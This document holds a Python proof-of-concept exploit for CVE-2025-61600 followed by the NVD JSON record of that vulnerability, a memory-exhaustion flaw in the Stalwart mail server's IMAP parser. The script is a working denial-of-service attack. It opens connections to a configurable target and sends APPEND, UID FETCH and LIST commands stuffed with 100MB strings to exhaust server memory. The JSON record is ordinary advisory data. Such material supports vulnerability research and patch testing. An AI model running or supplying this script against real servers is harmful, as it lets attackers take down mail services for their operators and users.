CVE-2025-61600

# CVE-2025-61600 PoC - Stalwart IMAP Parser Memory Exhaustion # This PoC demonstrates the unbounded memory allocation vulnerability # in Stalwart's IMAP CommandParser by sending commands with oversized # parameters to state handlers that lack buffer size validation. import socket import ssl import time import sys TARGET_HOST = "victim.example.com" TARGET_PORT = 143 # IMAP port (or 993 for IMAPS) USE_SSL = False PAYLOAD_SIZE = 100 * 1024 * 1024 # 100MB payload to exhaust memory def exploit_append_command(): """Exploit via APPEND command - parser state lacks size validation""" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(30) if USE_SSL: context = ssl.create_default_context() sock = context.wrap_socket(sock, server_hostname=TARGET_HOST) sock.connect((TARGET_HOST, TARGET_PORT)) # Read server greeting greeting = sock.recv(1024) print(f"[*] Server greeting: {greeting.decode().strip()}") # Send oversized APPEND command with a very long mailbox name # The APPEND state handler in CommandParser omits buffer size checks oversized_mbox = "A" * PAYLOAD_SIZE command = f'A001 APPEND "{oversized_mbox}" (\Seen) {{1024}}\r\n' print(f"[*] Sending oversized APPEND command ({len(command)} bytes)...") sock.sendall(command.encode()) time.sleep(2) sock.close() def exploit_uid_command(): """Exploit via UID FETCH command with oversized sequence set""" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(30) sock.connect((TARGET_HOST, TARGET_PORT)) greeting = sock.recv(1024) print(f"[*] Server greeting: {greeting.decode().strip()}") # Send UID FETCH with an extremely long sequence range string # The UID FETCH state handler lacks buffer size validation oversized_seq = ":" + "1," * (PAYLOAD_SIZE // 2) command = f'A002 UID FETCH {oversized_seq} (FLAGS)\r\n' print(f"[*] Sending oversized UID FETCH command ({len(command)} bytes)...") sock.sendall(command.encode()[:1024*1024]) # Send in chunks time.sleep(2) sock.close() def exploit_list_command(): """Exploit via LIST command with oversized mailbox pattern""" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(30) sock.connect((TARGET_HOST, TARGET_PORT)) greeting = sock.recv(1024) print(f"[*] Server greeting: {greeting.decode().strip()}") # Send LIST with oversized reference and mailbox pattern # The LIST state handler may omit buffer size validation oversized_pattern = "*" * PAYLOAD_SIZE command = f'A003 LIST "" "{oversized_pattern}"\r\n' print(f"[*] Sending oversized LIST command ({len(command)} bytes)...") sock.sendall(command.encode()[:1024*1024]) time.sleep(2) sock.close() if __name__ == "__main__": print(f"[*] CVE-2025-61600 PoC - Targeting {TARGET_HOST}:{TARGET_PORT}") try: exploit_append_command() time.sleep(1) exploit_uid_command() time.sleep(1) exploit_list_command() print("[*] Exploit payloads sent. Check target server memory status.") except Exception as e: print(f"[!] Error: {e}") sys.exit(1)

{"cve": {"id": "CVE-2025-61600", "sourceIdentifier": "[email protected]", "published": "2025-10-02T22:15:38.063", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stalwart is a mail and collaboration server. Versions 0.13.3 and below contain an unbounded memory allocation vulnerability in the IMAP protocol parser which allows remote attackers to exhaust server memory, potentially triggering the system's out-of-memory (OOM) killer and causing a denial of service. The CommandParser implementation enforces size limits on its dynamic buffer in most parsing states, but several state handlers omit these validation checks. This issue is fixed in version 0.13.4. A workaround for this issue is to implement rate limiting and connection monitoring at the network level, however this does not provide complete protection."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-789"}]}], "references": [{"url": "https://github.com/stalwartlabs/stalwart/commit/a8e631e881bded8128358732f18e02ca94a4e677", "source": "[email protected]"}, {"url": "https://github.com/stalwartlabs/stalwart/releases/tag/v0.13.4", "source": "[email protected]"}, {"url": "https://github.com/stalwartlabs/stalwart/security/advisories/GHSA-8jqj-qj5p-v5rr", "source": "[email protected]"}]}}